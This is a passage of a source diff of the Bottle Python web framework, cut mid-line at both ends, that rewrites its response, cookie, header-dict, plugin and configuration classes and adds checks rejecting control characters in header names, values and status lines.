self.environ['bottle.request.ext.%s' % name] + except KeyError: + raise AttributeError("Attribute not defined: %s" % name) +def _hkey(key): + if '\n' in key or '\r' in key or '\0' in key: + raise ValueError("Header names must not contain control characters: %r" % key) + return key.title().replace('_', '-') -def _hkey(s): - return s.title().replace('_','-') +def _hval(value): + value = tonat(value) + if '\n' in value or '\r' in value or '\0' in value: + raise ValueError("Header value must not contain control characters: %r" % value) + return value class HeaderProperty(object): - def __init__(self, name, reader=None, writer=str, default=''): + def __init__(self, name, reader=None, writer=None, default=''): self.name, self.default = name, default self.reader, self.writer = reader, writer self.__doc__ = 'Current value of the %r header.' % name.title() - def __get__(self, obj, cls): + def __get__(self, obj, _): if obj is None: return self - value = obj.headers.get(self.name, self.default) + value = obj.get_header(self.name, self.default) return self.reader(value) if self.reader else value def __set__(self, obj, value): - obj.headers[self.name] = self.writer(value) + obj[self.name] = self.writer(value) if self.writer else value def __delete__(self, obj): - del obj.headers[self.name] + del obj[self.name] class BaseResponse(object): @@ -1280,28 +1645,51 @@ class BaseResponse(object): default_status = 200 default_content_type = 'text/html; charset=UTF-8' - # Header blacklist for specific response codes + # Header denylist for specific response codes # (rfc2616 section 10.2.3 and 10.3.5) bad_headers = { - 204: set(('Content-Type',)), - 304: set(('Allow', 'Content-Encoding', 'Content-Language', + 204: frozenset(('Content-Type', 'Content-Length')), + 304: frozenset(('Allow', 'Content-Encoding', 'Content-Language', 'Content-Length', 'Content-Range', 'Content-Type', - 'Content-Md5', 'Last-Modified'))} + 'Content-Md5', 'Last-Modified')) + } + + def __init__(self, body='', status=None, headers=None, **more_headers): + """ Create a new response object. - def __init__(self, body='', status=None, **headers): + :param body: The response body as one of the supported types. + :param status: Either an HTTP status code (e.g. 200) or a status line + including the reason phrase (e.g. '200 OK'). + :param headers: A dictionary or a list of name-value pairs. + + Additional keyword arguments are added to the list of headers. + Underscores in the header name are replaced with dashes. + """ self._cookies = None - self._headers = {'Content-Type': [self.default_content_type]} + self._headers = {} self.body = body self.status = status or self.default_status if headers: - for name, value in headers.items(): - self[name] = value - - def copy(self): - ''' Returns a copy of self. ''' - copy = Response() + if isinstance(headers, dict): + headers = headers.items() + for name, value in headers: + self.add_header(name, value) + if more_headers: + for name, value in more_headers.items(): + self.add_header(name, value) + + def copy(self, cls=None): + """ Returns a copy of self. """ + cls = cls or BaseResponse + assert issubclass(cls, BaseResponse) + copy = cls() copy.status = self.status copy._headers = dict((k, v[:]) for (k, v) in self._headers.items()) + if self._cookies: + cookies = copy._cookies = SimpleCookie() + for k,v in self._cookies.items(): + cookies[k] = v.value + cookies[k].update(v) # also copy cookie attributes return copy def __iter__(self): @@ -1313,30 +1701,34 @@ def close(self): @property def status_line(self): - ''' The HTTP status line as a string (e.g. ``404 Not Found``).''' + """ The HTTP status line as a string (e.g. ``404 Not Found``).""" return self._status_line @property def status_code(self): - ''' The HTTP status code as an integer (e.g. 404).''' + """ The HTTP status code as an integer (e.g. 404).""" return self._status_code def _set_status(self, status): if isinstance(status, int): code, status = status, _HTTP_STATUS_LINES.get(status) elif ' ' in status: + if '\n' in status or '\r' in status or '\0' in status: + raise ValueError('Status line must not include control chars.') status = status.strip() - code = int(status.split()[0]) + code = int(status.split()[0]) else: raise ValueError('String status line without a reason phrase.') - if not 100 <= code <= 999: raise ValueError('Status code out of range.') + if not 100 <= code <= 999: + raise ValueError('Status code out of range.') self._status_code = code self._status_line = str(status or ('%d Unknown' % code)) def _get_status(self): return self._status_line - status = property(_get_status, _set_status, None, + status = property( + _get_status, _set_status, None, ''' A writeable property to change the HTTP response status. It accepts either a numeric code (100-999) or a string with a custom reason phrase (e.g. "404 Brain not found"). Both :data:`status_line` and @@ -1346,75 +1738,83 @@ def _get_status(self): @property def headers(self): - ''' An instance of :class:`HeaderDict`, a case-insensitive dict-like - view on the response headers. ''' + """ An instance of :class:`HeaderDict`, a case-insensitive dict-like + view on the response headers. """ hdict = HeaderDict() hdict.dict = self._headers return hdict - def __contains__(self, name): return _hkey(name) in self._headers - def __delitem__(self, name): del self._headers[_hkey(name)] - def __getitem__(self, name): return self._headers[_hkey(name)][-1] - def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)] + def __contains__(self, name): + return _hkey(name) in self._headers + + def __delitem__(self, name): + del self._headers[_hkey(name)] + + def __getitem__(self, name): + return self._headers[_hkey(name)][-1] + + def __setitem__(self, name, value): + self._headers[_hkey(name)] = [_hval(value)] def get_header(self, name, default=None): - ''' Return the value of a previously defined header. If there is no - header with that name, return a default value. ''' + """ Return the value of a previously defined header. If there is no + header with that name, return a default value. """ return self._headers.get(_hkey(name), [default])[-1] def set_header(self, name, value): - ''' Create a new response header, replacing any previously defined - headers with the same name. ''' - self._headers[_hkey(name)] = [str(value)] + """ Create a new response header, replacing any previously defined + headers with the same name. """ + self._headers[_hkey(name)] = [_hval(value)] def add_header(self, name, value): - ''' Add an additional response header, not removing duplicates. ''' - self._headers.setdefault(_hkey(name), []).append(str(value)) + """ Add an additional response header, not removing duplicates. """ + self._headers.setdefault(_hkey(name), []).append(_hval(value)) def iter_headers(self): - ''' Yield (header, value) tuples, skipping headers that are not - allowed with the current response status code. ''' + """ Yield (header, value) tuples, skipping headers that are not + allowed with the current response status code. """ return self.headerlist - def wsgiheader(self): - depr('The wsgiheader method is deprecated. See headerlist.') #0.10 - return self.headerlist + def _wsgi_status_line(self): + """ WSGI conform status line (latin1-encodeable) """ + if py3k: + return self._status_line.encode('utf8').decode('latin1') + return self._status_line @property def headerlist(self): - ''' WSGI conform list of (header, value) tuples. ''' + """ WSGI conform list of (header, value) tuples. """ out = [] - headers = self._headers.items() + headers = list(self._headers.items()) + if 'Content-Type' not in self._headers: + headers.append(('Content-Type', [self.default_content_type])) if self._status_code in self.bad_headers: bad_headers = self.bad_headers[self._status_code] headers = [h for h in headers if h[0] not in bad_headers] - out += [(name, val) for name, vals in headers for val in vals] + out += [(name, val) for (name, vals) in headers for val in vals] if self._cookies: for c in self._cookies.values(): - out.append(('Set-Cookie', c.OutputString())) + out.append(('Set-Cookie', _hval(c.OutputString()))) + if py3k: + out = [(k, v.encode('utf8').decode('latin1')) for (k, v) in out] return out content_type = HeaderProperty('Content-Type') - content_length = HeaderProperty('Content-Length', reader=int) + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + expires = HeaderProperty( + 'Expires', + reader=lambda x: datetime.fromtimestamp(parse_date(x), UTC), + writer=lambda x: http_date(x)) @property - def charset(self): + def charset(self, default='UTF-8'): """ Return the charset specified in the content-type header (default: utf8). """ if 'charset=' in self.content_type: return self.content_type.split('charset=')[-1].split(';')[0].strip() - return 'UTF-8' - - @property - def COOKIES(self): - """ A dict-like SimpleCookie instance. This should not be used directly. - See :meth:`set_cookie`. """ - depr('The COOKIES dict is deprecated. Use `set_cookie()` instead.') # 0.10 - if not self._cookies: - self._cookies = SimpleCookie() - return self._cookies + return default - def set_cookie(self, name, value, secret=None, **options): - ''' Create a new cookie or replace an old one. If the `secret` parameter is + def set_cookie(self, name, value, secret=None, digestmod=hashlib.sha256, **options): + """ Create a new cookie or replace an old one. If the `secret` parameter is set, create a `Signed Cookie` (described below). :param name: the name of the cookie. @@ -1424,7 +1824,7 @@ def set_cookie(self, name, value, secret=None, **options): Additionally, this method accepts all RFC 2109 attributes that are supported by :class:`cookie.Morsel`, including: - :param max_age: maximum age in seconds. (default: None) + :param maxage: maximum age in seconds. (default: None) :param expires: a datetime object or UNIX timestamp. (default: None) :param domain: the domain that is allowed to read the cookie. (default: current domain) @@ -1432,8 +1832,10 @@ def set_cookie(self, name, value, secret=None, **options): :param secure: limit the cookie to HTTPS connections (default: off). :param httponly: prevents client-side javascript to read this cookie (default: off, requires Python 2.6 or newer). + :param samesite: Control or disable third-party use for this cookie. + Possible values: `lax`, `strict` or `none` (default). - If neither `expires` nor `max_age` is set (default), the cookie will + If neither `expires` nor `maxage` is set (default), the cookie will expire at the end of the browser session (as soon as the browser window is closed). @@ -1441,37 +1843,60 @@ def set_cookie(self, name, value, secret=None, **options): cryptographically signed to prevent manipulation. Keep in mind that cookies are limited to 4kb in most browsers. + Warning: Pickle is a potentially dangerous format. If an attacker + gains access to the secret key, he could forge cookies that execute + code on server side if unpickled. Using pickle is discouraged and + support for it will be removed in later versions of bottle. + Warning: Signed cookies are not encrypted (the client can still see the content) and not copy-protected (the client can restore an old cookie). The main intention is to make pickling and unpickling save, not to store secret information at client side. - ''' + """ if not self._cookies: self._cookies = SimpleCookie() + # Monkey-patch Cookie lib to support 'SameSite' parameter + # https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.1 + if py < (3, 8, 0): + Morsel._reserved.setdefault('samesite', 'SameSite') + if secret: - value = touni(cookie_encode((name, value), secret)) + if not isinstance(value, basestring): + depr(0, 13, "Pickling of arbitrary objects into cookies is " + "deprecated.", "Only store strings in cookies. " + "JSON strings are fine, too.") + encoded = base64.b64encode(pickle.dumps([name, value], -1)) + sig = base64.b64encode(hmac.new(tob(secret), encoded, + digestmod=digestmod).digest()) + value = touni(tob('!') + sig + tob('?') + encoded) elif not isinstance(value, basestring): - raise TypeError('Secret key missing for non-string Cookie.') + raise TypeError('Secret key required for non-string cookies.') + + # Cookie size plus options must not exceed 4kb. + if len(name) + len(value) > 3800: + raise ValueError('Content does not fit into a cookie.') - if len(value) > 4096: raise ValueError('Cookie value to long.') self._cookies[name] = value for key, value in options.items(): - if key == 'max_age': + if key in ('max_age', 'maxage'): # 'maxage' variant added in 0.13 + key = 'max-age' if isinstance(value, timedelta): value = value.seconds + value.days * 24 * 3600 if key == 'expires': - if isinstance(value, (datedate, datetime)): - value = value.timetuple() - elif isinstance(value, (int, float)): - value = time.gmtime(value) - value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) - self._cookies[name][key.replace('_', '-')] = value + value = http_date(value) + if key in ('same_site', 'samesite'): # 'samesite' variant added in 0.13 + key, value = 'samesite', (value or "none").lower() + if value not in ('lax', 'strict', 'none'): + raise CookieError("Invalid value for SameSite") + if key in ('secure', 'httponly') and not value: + continue + self._cookies[name][key] = value def delete_cookie(self, key, **kwargs): - ''' Delete a cookie. Be sure to use the same `domain` and `path` - settings as used to create the cookie. ''' + """ Delete a cookie. Be sure to use the same `domain` and `path` + settings as used to create the cookie. """ kwargs['max_age'] = -1 kwargs['expires'] = 0 self.set_cookie(key, '', **kwargs) @@ -1482,169 +1907,155 @@ def __repr__(self): out += '%s: %s\n' % (name.title(), value.strip()) return out -#: Thread-local storage for :class:`LocalRequest` and :class:`LocalResponse` -#: attributes. -_lctx = threading.local() -def local_property(name): - def fget(self): +def _local_property(): + ls = threading.local() + + def fget(_): try: - return getattr(_lctx, name) + return ls.var except AttributeError: raise RuntimeError("Request context not initialized.") - def fset(self, value): setattr(_lctx, name, value) - def fdel(self): delattr(_lctx, name) - return property(fget, fset, fdel, - 'Thread-local property stored in :data:`_lctx.%s`' % name) + + def fset(_, value): + ls.var = value + + def fdel(_): + del ls.var + + return property(fget, fset, fdel, 'Thread-local property') class LocalRequest(BaseRequest): - ''' A thread-local subclass of :class:`BaseRequest` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseRequest` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`request`). If accessed during a request/response cycle, this instance always refers to the *current* - request (even on a multithreaded server). ''' + request (even on a multithreaded server). """ bind = BaseRequest.__init__ - environ = local_property('request_environ') + environ = _local_property() class LocalResponse(BaseResponse): - ''' A thread-local subclass of :class:`BaseResponse` with a different - set of attribues for each thread. There is usually only one global + """ A thread-local subclass of :class:`BaseResponse` with a different + set of attributes for each thread. There is usually only one global instance of this class (:data:`response`). Its attributes are used to build the HTTP response at the end of the request/response cycle. - ''' + """ bind = BaseResponse.__init__ - _status_line = local_property('response_status_line') - _status_code = local_property('response_status_code') - _cookies = local_property('response_cookies') - _headers = local_property('response_headers') - body = local_property('response_body') + _status_line = _local_property() + _status_code = _local_property() + _cookies = _local_property() + _headers = _local_property() + body = _local_property() + Request = BaseRequest Response = BaseResponse + class HTTPResponse(Response, BottleException): - def __init__(self, body='', status=None, header=None, **headers): - if header or 'output' in headers: - depr('Call signature changed (for the better)') - if header: headers.update(header) - if 'output' in headers: body = headers.pop('output') - super(HTTPResponse, self).__init__(body, status, **headers) - - def apply(self, response): - response._status_code = self._status_code - response._status_line = self._status_line - response._headers = self._headers - response._cookies = self._cookies - response.body = self.body - - def _output(self, value=None): - depr('Use HTTPResponse.body instead of HTTPResponse.output') - if value is None: return self.body - self.body = value - - output = property(_output, _output, doc='Alias for .body') + """ A subclass of :class:`Response` that can be raised or returned from request + handlers to short-curcuit request processing and override changes made to the + global :data:`request` object. This bypasses error handlers, even if the status + code indicates an error. Return or raise :class:`HTTPError` to trigger error + handlers. + """ -class HTTPError(HTTPResponse): - default_status = 500 - def __init__(self, status=None, body=None, exception=None, traceback=None, header=None, **headers): - self.exception = exception - self.traceback = traceback - super(HTTPError, self).__init__(body, status, header, **headers) + def __init__(self, body='', status=None, headers=None, **more_headers): + super(HTTPResponse, self).__init__(body, status, headers, **more_headers) + + def apply(self, other): + """ Copy the state of this response to a different :class:`Response` object. """ + other._status_code = self._status_code + other._status_line = self._status_line + other._headers = self._headers + other._cookies = self._cookies + other.body = self.body +class HTTPError(HTTPResponse): + """ A subclass of :class:`HTTPResponse` that triggers error handlers. """ + default_status = 500 + def __init__(self, + status=None, + body=None, + exception=None, + traceback=None, **more_headers): + self.exception = exception + self.traceback = traceback + super(HTTPError, self).__init__(body, status, **more_headers) ############################################################################### # Plugins ###################################################################### ############################################################################### -class PluginError(BottleException): pass + +class PluginError(BottleException): + pass + class JSONPlugin(object): name = 'json' - api = 2 + api = 2 def __init__(self, json_dumps=json_dumps): self.json_dumps = json_dumps + def setup(self, app): + app.config._define('json.enable', default=True, validate=bool, + help="Enable or disable automatic dict->json filter.") + app.config._define('json.ascii', default=False, validate=bool, + help="Use only 7-bit ASCII characters in output.") + app.config._define('json.indent', default=True, validate=bool, + help="Add whitespace to make json more readable.") + app.config._define('json.dump_func', default=None, + help="If defined, use this function to transform" + " dict into json. The other options no longer" + " apply.") + def apply(self, callback, route): dumps = self.json_dumps - if not dumps: return callback + if not self.json_dumps: return callback + + @functools.wraps(callback) def wrapper(*a, **ka): - rv = callback(*a, **ka) + try: + rv = callback(*a, **ka) + except HTTPResponse as resp: + rv = resp + if isinstance(rv, dict): #Attempt to serialize, raises exception on failure json_response = dumps(rv) - #Set content type only if serialization succesful + #Set content type only if serialization successful response.content_type = 'application/json' return json_response + elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict): + rv.body = dumps(rv.body) + rv.content_type = 'application/json' return rv - return wrapper - - -class HooksPlugin(object): - name = 'hooks' - api = 2 - - _names = 'before_request', 'after_request', 'app_reset' - - def __init__(self): - self.hooks = dict((name, []) for name in self._names) - self.app = None - def _empty(self): - return not (self.hooks['before_request'] or self.hooks['after_request']) - - def setup(self, app): - self.app = app - - def add(self, name, func): - ''' Attach a callback to a hook. ''' - was_empty = self._empty() - self.hooks.setdefault(name, []).append(func) - if self.app and was_empty and not self._empty(): self.app.reset() - - def remove(self, name, func): - ''' Remove a callback from a hook. ''' - was_empty = self._empty() - if name in self.hooks and func in self.hooks[name]: - self.hooks[name].remove(func) - if self.app and not was_empty and self._empty(): self.app.reset() - - def trigger(self, name, *a, **ka): - ''' Trigger a hook and return a list of results. ''' - hooks = self.hooks[name] - if ka.pop('reversed', False): hooks = hooks[::-1] - return [hook(*a, **ka) for hook in hooks] - - def apply(self, callback, route): - if self._empty(): return callback - def wrapper(*a, **ka): - self.trigger('before_request') - rv = callback(*a, **ka) - self.trigger('after_request', reversed=True) - return rv return wrapper class TemplatePlugin(object): - ''' This plugin applies the :func:`view` decorator to all routes with a + """ This plugin applies the :func:`view` decorator to all routes with a `template` config parameter. If the parameter is a tuple, the second element must be a dict with additional options (e.g. `template_engine`) - or default variables for the template. ''' + or default variables for the template. """ name = 'template' - api = 2 + api = 2 + + def setup(self, app): + app.tpl = self def apply(self, callback, route): conf = route.config.get('template') if isinstance(conf, (tuple, list)) and len(conf) == 2: return view(conf[0], **conf[1])(callback) - elif isinstance(conf, str) and 'template_opts' in route.config: - depr('The `template_opts` parameter is deprecated.') #0.9 - return view(conf, **route.config['template_opts'])(callback) elif isinstance(conf, str): return view(conf)(callback) else: @@ -1654,23 +2065,38 @@ def apply(self, callback, route): #: Not a plugin, but part of the plugin API. TODO: Find a better place. class _ImportRedirect(object): def __init__(self, name, impmask): - ''' Create a virtual package that redirects imports (see PEP 302). ''' + """ Create a virtual package that redirects imports (see PEP 302). """ self.name = name self.impmask = impmask - self.module = sys.modules.setdefault(name, imp.new_module(name)) - self.module.__dict__.update({'__file__': __file__, '__path__': [], - '__all__': [], '__loader__': self}) + self.module = sys.modules.setdefault(name, new_module(name)) + self.module.__dict__.update({ + '__file__': __file__, + '__path__': [], + '__all__': [], + '__loader__': self + }) sys.meta_path.append(self) + def find_spec(self, fullname, path, target=None): + if '.' not in fullname: return + if fullname.rsplit('.', 1)[0] != self.name: return + from importlib.util import spec_from_loader + return spec_from_loader(fullname, self) + def find_module(self, fullname, path=None): if '.' not in fullname: return - packname, modname = fullname.rsplit('.', 1) - if packname != self.name: return + if fullname.rsplit('.', 1)[0] != self.name: return return self + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass # This probably breaks importlib.reload() :/ + def load_module(self, fullname): if fullname in sys.modules: return sys.modules[fullname] - packname, modname = fullname.rsplit('.', 1) + modname = fullname.rsplit('.', 1)[1] realname = self.impmask % modname __import__(realname) module = sys.modules[fullname] = sys.modules[realname] @@ -1678,11 +2104,6 @@ def load_module(self, fullname): module.__loader__ = self return module - - - - - ############################################################################### # Common Utilities ############################################################# ############################################################################### @@ -1697,38 +2118,68 @@ class MultiDict(DictMixin): def __init__(self, *a, **k): self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items()) - def __len__(self): return len(self.dict) - def __iter__(self): return iter(self.dict) - def __contains__(self, key): return key in self.dict - def __delitem__(self, key): del self.dict[key] - def __getitem__(self, key): return self.dict[key][-1] - def __setitem__(self, key, value): self.append(key, value) - def keys(self): return self.dict.keys() + def __len__(self): + return len(self.dict) + + def __iter__(self): + return iter(self.dict) + + def __contains__(self, key): + return key in self.dict + + def __delitem__(self, key): + del self.dict[key] + + def __getitem__(self, key): + return self.dict[key][-1] + + def __setitem__(self, key, value): + self.append(key, value) + + def keys(self): + return self.dict.keys() if py3k: - def values(self): return (v[-1] for v in self.dict.values()) - def items(self): return ((k, v[-1]) for k, v in self.dict.items()) + + def values(self): + return (v[-1] for v in self.dict.values()) + + def items(self): + return ((k, v[-1]) for k, v in self.dict.items()) + def allitems(self): return ((k, v) for k, vl in self.dict.items() for v in vl) + iterkeys = keys itervalues = values iteritems = items iterallitems = allitems else: - def values(self): return [v[-1] for v in self.dict.values()] - def items(self): return [(k, v[-1]) for k, v in self.dict.items()] - def iterkeys(self): return self.dict.iterkeys() - def itervalues(self): return (v[-1] for v in self.dict.itervalues()) + + def values(self): + return [v[-1] for v in self.dict.values()] + + def items(self): + return [(k, v[-1]) for k, v in self.dict.items()] + + def iterkeys(self): + return self.dict.iterkeys() + + def itervalues(self): + return (v[-1] for v in self.dict.itervalues()) + def iteritems(self): return ((k, v[-1]) for k, v in self.dict.iteritems()) + def iterallitems(self): return ((k, v) for k, vl in self.dict.iteritems() for v in vl) + def allitems(self): return [(k, v) for k, vl in self.dict.iteritems() for v in vl] def get(self, key, default=None, index=-1, type=None): - ''' Return the most recent value for a key. + """ Return the most recent value for a key. :param default: The default value to be returned if the key is not present or the type conversion fails. @@ -1736,7 +2187,7 @@ def get(self, key, default=None, index=-1, type=None): :param type: If defined, this callable is used to cast the value into a specific type. Exception are suppressed and result in the default value to be returned. - ''' + """ try: val = self.dict[key][index] return type(val) if type else val @@ -1745,15 +2196,15 @@ def get(self, key, default=None, index=-1, type=None): return default def append(self, key, value): - ''' Add a new value to the list of values for this key. ''' + """ Add a new value to the list of values for this key. """ self.dict.setdefault(key, []).append(value) def replace(self, key, value): - ''' Replace the list of values with a single value. ''' + """ Replace the list of values with a single value. """ self.dict[key] = [value] def getall(self, key): - ''' Return a (possibly empty) list of values for a key. ''' + """ Return a (possibly empty) list of values for a key. """ return self.dict.get(key) or [] #: Aliases for WTForms to mimic other multi-dict APIs (Django) @@ -1761,14 +2212,13 @@ def getall(self, key): getlist = getall - class FormsDict(MultiDict): - ''' This :class:`MultiDict` subclass is used to store request form data. + """ This :class:`MultiDict` subclass is used to store request form data. Additionally to the normal dict-like item access methods (which return unmodified data as native strings), this container also supports attribute-like access to its values. Attributes are automatically de- or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing - attributes default to an empty string. ''' + attributes default to an empty string. """ #: Encoding used for attribute values. input_encoding = 'utf8' @@ -1777,16 +2227,17 @@ class FormsDict(MultiDict): recode_unicode = True def _fix(self, s, encoding=None): - if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI - s = s.encode('latin1') - if isinstance(s, bytes): # Python 2 WSGI + if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI + return s.encode('latin1').decode(encoding or self.input_encoding) + elif isinstance(s, bytes): # Python 2 WSGI return s.decode(encoding or self.input_encoding) - return s + else: + return s def decode(self, encoding=None): - ''' Returns a copy with all keys and values de- or recoded to match + """ Returns a copy with all keys and values de- or recoded to match :attr:`input_encoding`. Some libraries (e.g. WTForms) want a - unicode dictionary. ''' + unicode dictionary. """ copy = FormsDict() enc = copy.input_encoding = encoding or self.input_encoding copy.recode_unicode = False @@ -1795,6 +2246,7 @@ def decode(self, encoding=None): return copy def getunicode(self, name, default=None, encoding=None): + """ Return the value as a unicode string, or the default. """ try: return self._fix(self[name], encoding) except (UnicodeError, KeyError): @@ -1806,7 +2258,6 @@ def __getattr__(self, name, default=unicode()): return super(FormsDict, self).__getattr__(name) return self.getunicode(name, default=default) - class HeaderDict(MultiDict): """ A case-insensitive version of :class:`MultiDict` that defaults to replace the old value instead of appending it. """ @@ -1815,24 +2266,38 @@ def __init__(self, *a, **ka): self.dict = {} if a or ka: self.update(*a, **ka) - def __contains__(self, key): return _hkey(key) in self.dict - def __delitem__(self, key): del self.dict[_hkey(key)] - def __getitem__(self, key): return self.dict[_hkey(key)][-1] - def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)] + def __contains__(self, key): + return _hkey(key) in self.dict + + def __delitem__(self, key): + del self.dict[_hkey(key)] + + def __getitem__(self, key): + return self.dict[_hkey(key)][-1] + + def __setitem__(self, key, value): + self.dict[_hkey(key)] = [_hval(value)] + def append(self, key, value): - self.dict.setdefault(_hkey(key), []).append(str(value)) - def replace(self, key, value): self.dict[_hkey(key)] = [str(value)] - def getall(self, key): return self.dict.get(_hkey(key)) or [] + self.dict.setdefault(_hkey(key), []).append(_hval(value)) + + def replace(self, key, value): + self.dict[_hkey(key)] = [_hval(value)] + + def getall(self, key): + return self.dict.get(_hkey(key)) or [] + def get(self, key, default=None, index=-1): return MultiDict.get(self, _hkey(key), default, index) + def filter(self, names): - for name in [_hkey(n) for n in names]: + for name in (_hkey(n) for n in names): if name in self.dict: del self.dict[name] class WSGIHeaderDict(DictMixin): - ''' This dict-like class wraps a WSGI environ dict and provides convenient + """ This dict-like class wraps a WSGI environ dict and provides convenient access to HTTP_* fields. Keys and values are native strings (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI environment contains non-native string values, these are de- or encoded @@ -1841,7 +2306,7 @@ class WSGIHeaderDict(DictMixin): The API will remain stable even on changes to the relevant PEPs. Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one that uses non-native strings.) - ''' + """ #: List of keys that do not have a ``HTTP_`` prefix. cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH') @@ -1849,18 +2314,24 @@ def __init__(self, environ): self.environ = environ def _ekey(self, key): - ''' Translate header field name to CGI/WSGI environ key. ''' - key = key.replace('-','_').upper() + """ Translate header field name to CGI/WSGI environ key. """ + key = key.replace('-', '_').upper() if key in self.cgikeys: return key return 'HTTP_' + key def raw(self, key, default=None): - ''' Return the header value as is (may be bytes or unicode). ''' + """ Return the header value as is (may be bytes or unicode). """ return self.environ.get(self._ekey(key), default) def __getitem__(self, key): - return tonat(self.environ[self._ekey(key)], 'latin1') + val = self.environ[self._ekey(key)] + if py3k: + if isinstance(val, unicode): + val = val.encode('latin1').decode('utf8') + else: + val = val.decode('utf8') + return val def __setitem__(self, key, value): raise TypeError("%s is read-only." % self.__class__) @@ -1871,54 +2342,268 @@ def __delitem__(self, key): def __iter__(self): for key in self.environ: if key[:5] == 'HTTP_': - yield key[5:].replace('_', '-').title() + yield _hkey(key[5:]) elif key in self.cgikeys: - yield key.replace('_', '-').title() + yield _hkey(key) + + def keys(self): + return [x for x in self] - def keys(self): return [x for x in self] - def __len__(self): return len(self.keys()) - def __contains__(self, key): return self._ekey(key) in self.environ + def __len__(self): + return len(self.keys()) + def __contains__(self, key): + return self._ekey(key) in self.environ + +_UNSET = object() class ConfigDict(dict): - ''' A dict-subclass with some extras: You can access keys like attributes. - Uppercase attributes create new ConfigDicts and act as name-spaces. - Other missing attributes return None. Calling a ConfigDict updates its - values and returns itself. - - >>> cfg = ConfigDict() - >>> cfg.Namespace.value = 5 - >>> cfg.OtherNamespace(a=1, b=2) - >>> cfg - {'Namespace': {'value': 5}, 'OtherNamespace': {'a': 1, 'b': 2}} - ''' + """ A dict-like configuration storage with additional support for + namespaces, validators, meta-data and overlays. - def __getattr__(self, key): - if key not in self and key[0].isupper(): - self[key] = ConfigDict() - return self.get(key) + This dict-like class is heavily optimized for read access. + Read-only methods and item access should be as fast as a native dict. + """ + + __slots__ = ('_meta', '_change_listener', '_overlays', '_virtual_keys', '_source', '__weakref__') + + def __init__(self): + self._meta = {} + self._change_listener = [] + #: Weak references of overlays that need to be kept in sync. + self._overlays = [] + #: Config that is the source for this overlay. + self._source = None + #: Keys of values copied from the source (values we do not own) + self._virtual_keys = set() + + def load_module(self, name, squash=True): + """Load values from a Python module. + + Import a python module by name and add all upper-case module-level + variables to this config dict. + + :param name: Module name to import and load. + :param squash: If true (default), nested dicts are assumed to + represent namespaces and flattened (see :meth:`load_dict`). + """ + config_obj = load(name) + obj = {key: getattr(config_obj, key) + for key in dir(config_obj) if key.isupper()} + + if squash: + self.load_dict(obj) + else: + self.update(obj) + return self + + def load_config(self, filename, **options): + """ Load values from ``*.ini`` style config files using configparser. + + INI style sections (e.g. ``[section]``) are used as namespace for + all keys within that section. Both section and key names may contain + dots as namespace separators and are converted to lower-case. + + The special sections ``[bottle]`` and ``[ROOT]`` refer to the root + namespace and the ``[DEFAULT]`` section defines default values for all + other sections. - def __setattr__(self, key, value): - if hasattr(dict, key): - raise AttributeError('Read-only attribute.') - if key in self and self[key] and isinstance(self[key], ConfigDict): - raise AttributeError('Non-empty namespace attribute.') - self[key] = value + :param filename: The path of a config file, or a list of paths. + :param options: All keyword parameters are passed to the underlying + :class:`python:configparser.ConfigParser` constructor call. - def __delattr__(self, key): - if key in self: del self[key] + """ + options.setdefault('allow_no_value', True) + if py3k: + options.setdefault('interpolation', + configparser.ExtendedInterpolation()) + conf = configparser.ConfigParser(**options) + conf.read(filename) + for section in conf.sections(): + for key in conf.options(section): + value = conf.get(section, key) + if section not in ('bottle', 'ROOT'): + key = section + '.' + key + self[key.lower()] = value + return self + + def load_dict(self, source, namespace=''): + """ Load values from a dictionary structure. Nesting can be used to + represent namespaces. - def __call__(self, *a, **ka): - for key, value in dict(*a, **ka).items(): setattr(self, key, value) + >>> c = ConfigDict() + >>> c.load_dict({'some': {'namespace': {'key': 'value'} } }) + {'some.namespace.key': 'value'} + """ + for key, value in source.items(): + if isinstance(key, basestring): + nskey = (namespace + '.' + key).strip('.') + if isinstance(value, dict): + self.load_dict(value, namespace=nskey) + else: + self[nskey] = value + else: + raise TypeError('Key has type %r (not a string)' % type(key)) return self + def update(self, *a, **ka): + """ If the first parameter is a string, all keys are prefixed with this + namespace. Apart from that it works just as the usual dict.update(). + + >>> c = ConfigDict() + >>> c.update('some.namespace', key='value') + """ + prefix = '' + if a and isinstance(a[0], basestring): + prefix = a[0].strip('.') + '.' + a = a[1:] + for key, value in dict(*a, **ka).items(): + self[prefix + key] = value + + def setdefault(self, key, value=None): + if key not in self: + self[key] = value + return self[key] + + def __setitem__(self, key, value): + if not isinstance(key, basestring): + raise TypeError('Key has type %r (not a string)' % type(key)) + + self._virtual_keys.discard(key) + + value = self.meta_get(key, 'filter', lambda x: x)(value) + if key in self and self[key] is value: + return + + self._on_change(key, value) + dict.__setitem__(self, key, value) + + for overlay in self._iter_overlays(): + overlay._set_virtual(key, value) + + def __delitem__(self, key): + if key not in self: + raise KeyError(key) + if key in self._virtual_keys: + raise KeyError("Virtual keys cannot be deleted: %s" % key) + + if self._source and key in self._source: + # Not virtual, but present in source -> Restore virtual value + dict.__delitem__(self, key) + self._set_virtual(key, self._source[key]) + else: # not virtual, not present in source. This is OUR value + self._on_change(key, None) + dict.__delitem__(self, key) + for overlay in self._iter_overlays(): + overlay._delete_virtual(key) + + def _set_virtual(self, key, value): + """ Recursively set or update virtual keys. """ + if key in self and key not in self._virtual_keys: + return # Do nothing for non-virtual keys. + + self._virtual_keys.add(key) + if key in self and self[key] is not value: + self._on_change(key, value) + dict.__setitem__(self, key, value) + for overlay in self._iter_overlays(): + overlay._set_virtual(key, value) + + def _delete_virtual(self, key): + """ Recursively delete virtual entry. """ + if key not in self._virtual_keys: + return # Do nothing for non-virtual keys. + + if key in self: + self._on_change(key, None) + dict.__delitem__(self, key) + self._virtual_keys.discard(key) + for overlay 